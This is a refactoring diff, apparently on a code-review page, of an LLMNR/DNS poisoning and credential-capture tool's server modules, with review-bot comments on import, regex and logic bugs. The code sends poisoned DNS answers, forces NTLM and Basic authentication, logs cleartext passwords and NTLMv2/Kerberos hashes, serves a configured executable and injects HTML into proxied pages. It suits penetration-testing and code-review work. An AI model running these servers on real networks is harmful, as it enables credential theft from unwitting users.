diff --git a/servers/Browser.py b/servers/Browser.py
index 42c5443..20a4210 100644
--- a/servers/Browser.py
+++ b/servers/Browser.py
@@ -14,16 +14,13 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import socket
-import struct
-import settings
-
from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
from SocketServer import BaseRequestHandler
from utils import *
+
def WorkstationFingerPrint(data):
- Role = {
+ return {
"\x04\x00" :"Windows 95",
"\x04\x10" :"Windows 98",
"\x04\x90" :"Windows ME",
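Review bot: Dropping `import socket`, `import struct` and `import settings` leaves this module depending on `from utils import *` to put those names in scope, and `struct.unpack` is still called in ParsePacket further down. utils.py is not part of this diff, so I cannot confirm that it imports them all, or that an `__all__` added there later will not hide them. The same pattern repeats in the import hunks of DNS.py (`import re` removed while `re.sub` is still used), FTP.py, HTTP.py, HTTP_Proxy.py, IMAP.py, Kerberos.py, LDAP.py, MSSQL.py, POP3.py, SMB.py and SMTP.py. I would keep an explicit import for every module a file actually uses, e.g. `import struct` here, and remove only the ones that are genuinely unused.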
@@ -35,12 +32,11 @@ def WorkstationFingerPrint(data):
"\x06\x02" :"Windows 8/Server 2012",
"\x06\x03" :"Windows 8.1/Server 2012R2",
"\x10\x00" :"Windows 10/Server 2016",
- }
+ }.get(data, 'Unknown')
- return Role[data] if data in Role else "Unknown"
def RequestType(data):
- Type = {
+ return {
"\x01": 'Host Announcement',
"\x02": 'Request Announcement',
"\x08": 'Browser Election',
@@ -51,30 +47,23 @@ def RequestType(data):
"\x0d": 'Master Announcement',
"\x0e": 'Reset Browser State Announcement',
"\x0f": 'Local Master Announcement',
- }
+ }.get(data, 'Unknown')
- return Type[data] if data in Type else "Unknown"
def PrintServerName(data, entries):
- if entries > 0:
+ if entries <= 0:
+ return None
+ entrieslen = 26 * entries
+ chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
+ ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
- entrieslen = 26*entries
- chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
- ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
+ l = []
+ for x in ServerName:
+ fingerprint = WorkstationFingerPrint(x[16:18])
+ name = x[:16].replace('\x00', '')
+ l.append('%s (%s)' % (name, fingerprint))
+ return l
- l = []
- for x in ServerName:
- FP = WorkstationFingerPrint(x[16:18])
- Name = x[:16].replace('\x00', '')
-
- if FP:
- l.append(Name + ' (%s)' % FP)
- else:
- l.append(Name)
-
- return l
-
- return None
def ParsePacket(Payload):
PayloadOffset = struct.unpack('.
-import re
-
from packets import DNS_Ans
from SocketServer import BaseRequestHandler
from utils import *
@@ -24,13 +22,12 @@ def ParseDNSType(data):
QueryTypeClass = data[len(data)-4:]
# If Type A, Class IN, then answer.
- return True if QueryTypeClass == "\x00\x01\x00\x01" else False
+ return QueryTypeClass == "\x00\x01\x00\x01"
+
+
-# DNS Server class
class DNS(BaseRequestHandler):
-
def handle(self):
-
# Break out if we don't want to respond to this host
if RespondToThisIP(self.client_address[0]) is not True:
return None
@@ -43,7 +40,7 @@ class DNS(BaseRequestHandler):
buff.calculate(data)
soc.sendto(str(buff), self.client_address)
- ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+ ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print color("[*] [DNS] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
except Exception:
@@ -51,9 +48,7 @@ class DNS(BaseRequestHandler):
# DNS Server TCP Class
class DNSTCP(BaseRequestHandler):
-
def handle(self):
-
# Break out if we don't want to respond to this host
if RespondToThisIP(self.client_address[0]) is not True:
return None
@@ -61,7 +56,7 @@ class DNSTCP(BaseRequestHandler):
try:
data = self.request.recv(1024)
- if ParseDNSType(data) and settings.Config.AnalyzeMode == False:
+ if ParseDNSType(data) and settings.Config.AnalyzeMode is False:
buff = DNS_Ans()
buff.calculate(data)
self.request.send(str(buff))
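Review bot: `settings.Config.AnalyzeMode is False` in DNSTCP.handle is an identity test, not a restyle of `== False`: a falsy non-bool such as `0` satisfied the old comparison but fails the new one. The type of the option is not visible in this diff, so if it can ever be anything other than a real bool this branch silently changes behaviour. The plain truth test reads better and avoids the question: `if ParseDNSType(data) and not settings.Config.AnalyzeMode:`. The same applies to `Serve_Always is True` and `Serve_Exe is True` in PacketSequence in HTTP.py. handle starts outside this hunk.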
diff --git a/servers/FTP.py b/servers/FTP.py
index 6b1a5e1..0a3f7d0 100644
--- a/servers/FTP.py
+++ b/servers/FTP.py
@@ -14,8 +14,6 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
from utils import *
from SocketServer import BaseRequestHandler
@@ -47,7 +45,7 @@ class FTP(BaseRequestHandler):
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
- 'fullhash': User+':'+Pass
+ 'fullhash': User + ':' + Pass
})
else:
diff --git a/servers/HTTP.py b/servers/HTTP.py
index d55eb6c..f2d7018 100644
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@@ -14,12 +14,9 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import struct
-import settings
-from SocketServer import BaseServer, BaseRequestHandler, StreamRequestHandler, ThreadingMixIn, TCPServer
-from base64 import b64decode, b64encode
+from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode
from utils import *
from packets import NTLM_Challenge
@@ -72,58 +69,52 @@ def ParseHTTPHash(data, client):
'type': 'NTLMv2',
'client': client,
'host': HostName,
- 'user': Domain+'\\'+User,
- 'hash': NTHash[:32]+":"+NTHash[32:],
+ 'user': Domain + '\\' + User,
+ 'hash': NTHash[:32] + ":" + NTHash[32:],
'fullhash': WriteHash,
})
def GrabCookie(data, host):
- Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
+ Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
if Cookie:
Cookie = Cookie.group(0).replace('Cookie: ', '')
if len(Cookie) > 1 and settings.Config.Verbose:
print text("[HTTP] Cookie : %s " % Cookie)
return Cookie
- else:
- return False
+ return False
def GrabHost(data, host):
- Host = re.search('(Host:*.\=*)[^\r\n]*', data)
+ Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
if Host:
Host = Host.group(0).replace('Host: ', '')
if settings.Config.Verbose:
print text("[HTTP] Host : %s " % color(Host, 3))
return Host
- else:
- return False
+ return False
def GrabReferer(data, host):
- Referer = re.search('(Referer:*.\=*)[^\r\n]*', data)
+ Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data)
if Referer:
Referer = Referer.group(0).replace('Referer: ', '')
if settings.Config.Verbose:
print text("[HTTP] Referer : %s " % color(Referer, 3))
return Referer
- else:
- return False
+ return False
def WpadCustom(data, client):
- Wpad = re.search('(/wpad.dat|/*\.pac)', data)
+ Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
if Wpad:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate()
return str(Buffer)
- else:
- return False
+ return False
def ServeFile(Filename):
with open (Filename, "rb") as bk:
- data = bk.read()
- bk.close()
- return data
+ return bk.read()
def RespondWithFile(client, filename, dlname=None):
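Review bot: GrabCookie, GrabHost and GrabReferer print the captured header value straight to the console (`print text("[HTTP] Cookie : %s " % Cookie)`). The pattern `[^\r\n]*` stops at line ends but lets other control bytes such as ESC through, so unless `text()` filters them (not visible here) a remote peer can write escape sequences to the operator's terminal. Formatting with `repr(Cookie)` or stripping non-printable characters before printing would close that. Separately, the three functions take a `host` argument that is never used in the lines shown.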
@@ -138,9 +129,9 @@ def RespondWithFile(client, filename, dlname=None):
return str(Buffer)
def GrabURL(data, host):
- GET = re.findall('(?<=GET )[^HTTP]*', data)
- POST = re.findall('(?<=POST )[^HTTP]*', data)
- POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
+ GET = re.findall(r'(?<=GET )[^HTTP]*', data)
+ POST = re.findall(r'(?<=POST )[^HTTP]*', data)
+ POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
if GET and settings.Config.Verbose:
print text("[HTTP] GET request from: %-15s URL: %s" % (host, color(''.join(GET), 5)))
@@ -152,11 +143,11 @@ def GrabURL(data, host):
# Handle HTTP packet sequence.
def PacketSequence(data, client):
- NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
- Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
+ NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\\r]*', data)
+ Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\\r]*', data)
# Serve the .exe if needed
- if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
+ if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall('.exe', data)):
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
# Serve the custom HTML if needed
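Review bot: Adding the `r` prefix to `'(?<=Authorization: NTLM )[^\\r]*'` changes the pattern, not just its spelling. In the old non-raw literal the regex engine received `[^\r]` (anything but a carriage return), while in the raw literal `[^\\r]` excludes a backslash and the letter `r`. The header value is now cut at the first `r` and no longer stops at the end of the line, and the Basic pattern on the next line has the same problem. Drop one backslash when switching to raw strings: `r'(?<=Authorization: NTLM )[^\r]*'` and `r'(?<=Authorization: Basic )[^\r]*'`. PacketSequence continues outside the hunk.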
@@ -189,7 +180,6 @@ def PacketSequence(data, client):
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
print text("[HTTP] WPAD (auth) file sent to %s" % client)
return WPAD_Custom
-
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
@@ -215,28 +205,23 @@ def PacketSequence(data, client):
if settings.Config.Verbose:
print text("[HTTP] WPAD (auth) file sent to %s" % client)
return WPAD_Custom
-
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
-
else:
if settings.Config.Basic:
Response = IIS_Basic_401_Ans()
if settings.Config.Verbose:
print text("[HTTP] Sending BASIC authentication request to %s" % client)
-
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
print text("[HTTP] Sending NTLM authentication request to %s" % client)
-
return str(Response)
# HTTP Server class
class HTTP(BaseRequestHandler):
-
def handle(self):
try:
while True:
diff --git a/servers/HTTP_Proxy.py b/servers/HTTP_Proxy.py
index 21aa431..836d1ea 100644
--- a/servers/HTTP_Proxy.py
+++ b/servers/HTTP_Proxy.py
@@ -14,8 +14,6 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
import urlparse
import select
import zlib
@@ -43,24 +41,20 @@ def InjectData(data, client, req_uri):
return data
RedirectCodes = ['HTTP/1.1 300', 'HTTP/1.1 301', 'HTTP/1.1 302', 'HTTP/1.1 303', 'HTTP/1.1 304', 'HTTP/1.1 305', 'HTTP/1.1 306', 'HTTP/1.1 307']
-
- if [s for s in RedirectCodes if s in Headers]:
+ if set(RedirectCodes) & set(Headers):
return data
if "content-encoding: gzip" in Headers.lower():
Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)
if "content-type: text/html" in Headers.lower():
-
- # Serve the custom HTML if needed
- if settings.Config.Serve_Html:
+ if settings.Config.Serve_Html: # Serve the custom HTML if needed
return RespondWithFile(client, settings.Config.Html_Filename)
- Len = ''.join(re.findall('(?<=Content-Length: )[^\r\n]*', Headers))
- HasBody = re.findall('(
]*>)', Content)
+ Len = ''.join(re.findall(r'(?<=Content-Length: )[^\r\n]*', Headers))
+ HasBody = re.findall(r'(]*>)', Content)
if HasBody and len(settings.Config.HtmlToInject) > 2:
-
if settings.Config.Verbose:
print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))
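Review bot: `set(RedirectCodes) & set(Headers)` in InjectData is not equivalent to the list comprehension it replaces. `Headers` is used as a string here (`Headers.lower()` two lines later), so `set(Headers)` is a set of single characters and its intersection with the multi-character status strings is always empty. Redirect responses are therefore no longer returned unmodified. Keep the substring test: `if any(code in Headers for code in RedirectCodes):`. InjectData starts and ends outside the hunk.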
@@ -71,11 +65,9 @@ def InjectData(data, client, req_uri):
Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
data = Headers +'\r\n\r\n'+ Content
-
else:
if settings.Config.Verbose:
print text("[PROXY] Returning unmodified HTTP response")
-
return data
class ProxySock:
@@ -96,19 +88,17 @@ class ProxySock:
def connect(self, address) :
# Store the real remote adress
- (self.host, self.port) = address
+ self.host, self.port = address
# Try to connect to the proxy
for (family, socktype, proto, canonname, sockaddr) in socket.getaddrinfo(
self.proxy_host,
self.proxy_port,
- 0, 0, socket.SOL_TCP) :
+ 0, 0, socket.SOL_TCP):
try:
-
# Replace the socket by a connection to the proxy
self.socket = socket.socket(family, socktype, proto)
self.socket.connect(sockaddr)
-
except socket.error, msg:
if self.socket:
self.socket.close()
@@ -116,7 +106,7 @@ class ProxySock:
continue
break
if not self.socket :
- raise socket.error, ms
+ raise socket.error, msg
# Ask him to create a tunnel connection to the target host/port
self.socket.send(
diff --git a/servers/IMAP.py b/servers/IMAP.py
index c0ae12b..050c9bb 100644
--- a/servers/IMAP.py
+++ b/servers/IMAP.py
@@ -14,16 +14,11 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
-
from utils import *
from SocketServer import BaseRequestHandler
from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
-# IMAP4 Server class
class IMAP(BaseRequestHandler):
-
def handle(self):
try:
self.request.send(str(IMAPGreeting()))
@@ -50,6 +45,5 @@ class IMAP(BaseRequestHandler):
## FIXME: Close connection properly
## self.request.send(str(ditchthisconnection()))
## data = self.request.recv(1024)
-
except Exception:
pass
\ No newline at end of file
diff --git a/servers/Kerberos.py b/servers/Kerberos.py
index b3ac4bf..32bd23e 100644
--- a/servers/Kerberos.py
+++ b/servers/Kerberos.py
@@ -14,10 +14,6 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import struct
-import settings
-
from SocketServer import BaseRequestHandler
from utils import *
@@ -50,8 +46,7 @@ def ParseMSKerbv5TCP(Data):
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
-
- if HashLen == 54:
+ elif HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('.
-import os
-import struct
-import settings
-
from SocketServer import BaseRequestHandler
from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
from utils import *
def ParseSearch(data):
- Search1 = re.search('(objectClass)', data)
- Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
- Search3 = re.search('(?i)(objectClass0*.*supportedSASLMechanisms)', data)
-
- if Search1:
+ if re.search(r'(objectClass)', data):
return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
- if Search2:
+ elif re.search(r'(?i)(objectClass0*.*supportedCapabilities)', data):
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
- if Search3:
+ elif re.search(r'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
def ParseLDAPHash(data, client):
@@ -54,7 +46,7 @@ def ParseLDAPHash(data, client):
UserOffset = struct.unpack('i',data[2:6])[0]
MessageSequence = struct.unpack('.
-import os
-import struct
-import settings
-
from SocketServer import BaseRequestHandler
from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
from utils import *
@@ -54,6 +50,7 @@ class TDS_Login_Packet:
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
+
def ParseSQLHash(data, client):
SSPIStart = data[8:]
@@ -97,17 +94,17 @@ def ParseSQLHash(data, client):
'fullhash': WriteHash,
})
+
def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5',''))
- Pw = []
+ Pw = ''
for x in Pwd:
- Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
- return ''.join(Pw)
+ Pw += hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')
+ return Pw
+
def ParseClearTextSQLPass(data, client):
-
TDS = TDS_Login_Packet(data)
-
SaveToDb({
'module': 'MSSQL',
'type': 'Cleartext',
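Review bot: A point of style in ParseSqlClearTxtPwd: the change swaps the `append` plus `''.join(Pw)` idiom for `Pw += ...` inside the loop, which is the less idiomatic and potentially quadratic way to build a string, so I would keep the join. The per-byte expression `hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')` also needs a comment saying what it computes. As far as I can read it, it swaps the two nibbles of `x ^ 0xa5`, which could be written arithmetically as `chr(((v << 4) | (v >> 4)) & 0xff)` with `v = x ^ 0xa5`.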
@@ -120,7 +117,6 @@ def ParseClearTextSQLPass(data, client):
# MSSQL Server class
class MSSQL(BaseRequestHandler):
-
def handle(self):
if settings.Config.Verbose:
print text("[MSSQL] Received connection from %s" % self.client_address[0])
@@ -130,28 +126,24 @@ class MSSQL(BaseRequestHandler):
data = self.request.recv(1024)
self.request.settimeout(0.1)
- # Pre-Login Message
- if data[0] == "\x12":
+
+ if data[0] == "\x12": # Pre-Login Message
Buffer = str(MSSQLPreLoginAnswer())
self.request.send(Buffer)
data = self.request.recv(1024)
- # NegoSSP
- if data[0] == "\x10":
+ if data[0] == "\x10": # NegoSSP
if re.search("NTLMSSP",data):
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
Packet.calculate()
Buffer = str(Packet)
self.request.send(Buffer)
data = self.request.recv(1024)
-
else:
ParseClearTextSQLPass(data,self.client_address[0])
-
- # NegoSSP Auth
- if data[0] == "\x11":
+
+ if data[0] == "\x11": # NegoSSP Auth
ParseSQLHash(data,self.client_address[0])
except socket.timeout:
- pass
self.request.close()
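Review bot: `data[0]` is indexed right after `self.request.recv(1024)` with no check for an empty read, so a peer that connects and closes raises IndexError, which the `except socket.timeout:` clause does not catch. Comparing a slice instead, e.g. `if data[:1] == "\x12":`, makes the three checks safe on empty input. With the `pass` removed, `self.request.close()` looks like the whole body of the except clause (indentation is not visible on this page), so the socket would be closed only on timeout; a `finally:` block would close it on every path. handle starts outside the hunk.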
diff --git a/servers/POP3.py b/servers/POP3.py
index 5bdfa7e..00e6b06 100644
--- a/servers/POP3.py
+++ b/servers/POP3.py
@@ -14,22 +14,16 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
-
from utils import *
from SocketServer import BaseRequestHandler
from packets import POPOKPacket
# POP3 Server class
class POP3(BaseRequestHandler):
-
def SendPacketAndRead(self):
Packet = POPOKPacket()
self.request.send(str(Packet))
- data = self.request.recv(1024)
-
- return data
+ return self.request.recv(1024)
def handle(self):
try:
@@ -38,7 +32,6 @@ class POP3(BaseRequestHandler):
if data[0:4] == "USER":
User = data[5:].replace("\r\n","")
data = self.SendPacketAndRead()
-
if data[0:4] == "PASS":
Pass = data[5:].replace("\r\n","")
@@ -50,11 +43,6 @@ class POP3(BaseRequestHandler):
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
-
- data = self.SendPacketAndRead()
-
- else:
- data = self.SendPacketAndRead()
-
+ self.SendPacketAndRead()
except Exception:
pass
\ No newline at end of file
diff --git a/servers/SMB.py b/servers/SMB.py
index 40c195c..e4632b1 100644
--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -14,84 +14,49 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import struct
-import settings
-
from random import randrange
-from packets import SMBHeader, SMBNegoAnsLM, SMBNegoAns, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData
+from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData
from SocketServer import BaseRequestHandler
from utils import *
-# Detect if SMB auth was Anonymous
-def Is_Anonymous(data):
+
+def Is_Anonymous(data): # Detect if SMB auth was Anonymous
SecBlobLen = struct.unpack(' 260:
+ return LMhashLen in [0, 1]
+ elif SecBlobLen > 260:
LMhashLen = struct.unpack(' 2:
-
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
-# SMB Server class, NTLMSSP
-class SMB1(BaseRequestHandler):
+class SMB1(BaseRequestHandler): # SMB Server class, NTLMSSP
def handle(self):
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
- if len(data) < 1:
+ if not data:
break
- ##session request 139
- if data[0] == "\x81":
+ if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
try:
- self.request.send(Buffer)
+ self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
- # Negociate Protocol Response
- if data[8:10] == "\x72\x00":
- # \x72 == Negociate Protocol Response
+ if data[8:10] == "\x72\x00": # Negociate Protocol Response
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
@@ -249,8 +207,7 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
- # Session Setup AndX Request
- if data[8:10] == "\x73\x00":
+ if data[8:10] == "\x73\x00": # Session Setup AndX Request
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
@@ -264,8 +221,8 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(4096)
- # STATUS_SUCCESS
- if data[8:10] == "\x73\x00":
+
+ if data[8:10] == "\x73\x00": # STATUS_SUCCESS
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
@@ -290,10 +247,9 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
- # Tree Connect AndX Request
- if data[8:10] == "\x75\x00":
+
+ if data[8:10] == "\x75\x00": # Tree Connect AndX Request
ParseShare(data)
- # Tree Connect AndX Response
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
@@ -304,8 +260,7 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
- ##Tree Disconnect.
- if data[8:10] == "\x71\x00":
+ if data[8:10] == "\x71\x00": #Tree Disconnect
Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
@@ -314,9 +269,8 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
-
- ##NT_CREATE Access Denied.
- if data[8:10] == "\xa2\x00":
+
+ if data[8:10] == "\xa2\x00": #NT_CREATE Access Denied.
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
@@ -325,9 +279,8 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
-
- ##Trans2 Access Denied.
- if data[8:10] == "\x25\x00":
+
+ if data[8:10] == "\x25\x00": # Trans2 Access Denied.
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
@@ -337,8 +290,8 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
- ##LogOff.
- if data[8:10] == "\x74\x00":
+
+ if data[8:10] == "\x74\x00": # LogOff
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
@@ -351,22 +304,19 @@ class SMB1(BaseRequestHandler):
except socket.timeout:
pass
-# SMB Server class, old version
-class SMB1LM(BaseRequestHandler):
+class SMB1LM(BaseRequestHandler): # SMB Server class, old version
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
-
- ##session request 139
- if data[0] == "\x81":
+
+ if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
-
- ##Negotiate proto answer.
- if data[8:10] == "\x72\x00":
+
+ if data[8:10] == "\x72\x00": #Negotiate proto answer.
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
Body.calculate()
@@ -374,23 +324,20 @@ class SMB1LM(BaseRequestHandler):
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
-
- ##Session Setup AndX Request
- if data[8:10] == "\x73\x00":
+
+ if data[8:10] == "\x73\x00": #Session Setup AndX Request
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
-
else:
ParseLMNTHash(data,self.client_address[0])
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
- Packet = str(head)+str(SMBSessEmpty())
- Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+ Packet = str(head) + str(SMBSessEmpty())
+ Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
-
except Exception:
self.request.close()
- pass
+ pass
\ No newline at end of file
diff --git a/servers/SMTP.py b/servers/SMTP.py
index aeb3111..9c6b243 100644
--- a/servers/SMTP.py
+++ b/servers/SMTP.py
@@ -14,15 +14,11 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
-
from utils import *
-from base64 import b64decode, b64encode
+from base64 import b64decode
from SocketServer import BaseRequestHandler
from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
-# ESMTP Server class
class ESMTP(BaseRequestHandler):
def handle(self):